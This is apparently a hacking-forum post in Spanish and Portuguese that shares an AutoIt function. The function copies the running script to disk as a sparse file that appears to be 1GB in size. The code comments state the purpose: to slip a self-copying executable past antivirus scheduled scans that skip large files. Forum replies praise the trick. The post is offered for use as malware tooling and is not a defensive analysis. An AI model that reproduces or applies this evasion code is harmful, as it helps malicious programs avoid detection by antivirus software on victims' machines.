Buenas capos que tal todos ?

Nadie raro , los dejo esta funcion simple que sirve para bypassear algunos tantos Av's en rutina de scaneamento ,

La utilizem en quando quieram auto-copiar ao disco duro tu archivo , la funcion crea un archivo de 1GB , pero sin allocaccion en disco

Espero les sirva de algo ....

Saludos

#Include <WinApiEx.au3>
;# =================================================================================
;# FakeSizeAllocation On Disk
;# Ported from C++ Reference
;# Reference [url]http://msdn.microsoft.com/en-us/library/windows/desktop/aa364596%28v=vs.85%29.aspx[/url]
;# Author : M3
;# Pourpose : Create a 1GB File to Disk Without Allocation ( Check File Property to See )
;# Note :
;# Bypass Schedduler AV Scanners Routines When is Running ( By Size )
;# Tested on WIN_7 x86
;# Coded in AutoItVersion 3.3.8.1
;# Usage : FakeSizeAllocation(@ScriptFullPath , @ScriptDir & '\TestFile.exe' )
;# Enjoy
;# =================================================================================



Func FakeSizeAllocation($sFullFilePath , $sCopyToPath)


	; Declare Vars | Const

	Const $sFSCTL_SET_SPARSE = 0x000900C4 ;  Control Code to Sparse "0" on File Without Allocation Disk  ( DeviceIoControl Reference)

	Local $sBytes , $sPos = 1024 , $sInvalidHandle = 0 , $sPointer = $sPos * $sPos

    Local $sFileRead , $sGetFileLen , $sStruct , $sBufferStruct , $sStructGetBuffer , $sFileCreate , $sWriteFile

	Local $sSparseFile , $sError , $sSetPointer , $sSetSizeFromPointer , $sCloseHandle


	; Start Code

	If FileExists($sFullFilePath) Then ; Check If File Exists

	$sFileRead = FileRead($sFullFilePath) ; Read File to Copy

	$sGetFileLen = BinaryLen($sFileRead) ; Get Binary Bytes

	$sStruct = "Byte" & "[" & $sGetFileLen & "]" ; Create a Pointer to allocate Data

	$sBufferStruct = DllStructCreate($sStruct) ; Create a Struct with pointer

	DllStructSetData($sBufferStruct, 1, $sFileRead) ; Set Specific Data in Struct Element

	$sStructGetBuffer = DllStructGetPtr($sBufferStruct , 1) ; Get Pointer From this Element

	$sFileCreate = _WinAPI_CreateFile($sCopyToPath , 1 ) ; Create File to Copy

	$sWriteFile = _WinAPI_WriteFile($sFileCreate , $sStructGetBuffer, $sGetFileLen, $sBytes) ; Write File With Pointer Element Buffer

    $sSparseFile = _WinAPI_DeviceIoControl($sFileCreate, $sFSCTL_SET_SPARSE , 0 , 0 , 0) ; Set Sparse File Without allocate Size


        If $sSparseFile = $sInvalidHandle Then ; Check if Handle from DeviceIoControl is false

            $sError = _WinAPI_GetLastError()   ; Get Error from DeviceIoControl Call

			ConsoleWrite('Fail .... Error Code : ' & $sError & @CRLF) ; Write the error Number from DeviceIoControl Call Fail

			Exit

		EndIf


	$sSetPointer = _WinAPI_SetFilePointer($sFileCreate , $sPointer * $sPos , 0) ; Move the pointer from Created file

	$sSetSizeFromPointer = _WinAPI_SetEndOfFile($sFileCreate) ; Set File Size to pointer

	$sCloseHandle = _WinAPI_CloseHandle($sFileCreate) ; Close the handle from CreateFile

	ConsoleWrite (@CRLF & 'Success .... ')

    Else

    ConsoleWrite (@CRLF & 'Fail to Read File .... ')

    EndIf

    ; EndCode

EndFunc

a bypasear se a dicho!
con razon mu codigo no funcionaba me faltaban algunas partes

• button 1start
  select file:=edit1
  increment filesize:=1gb
  if file increment successfully
  bypasing all av
  then destroy av
  then 'todo ok'
  
  button end

muy buena idea m3

Muy buen trabajo M3

Muy buen code...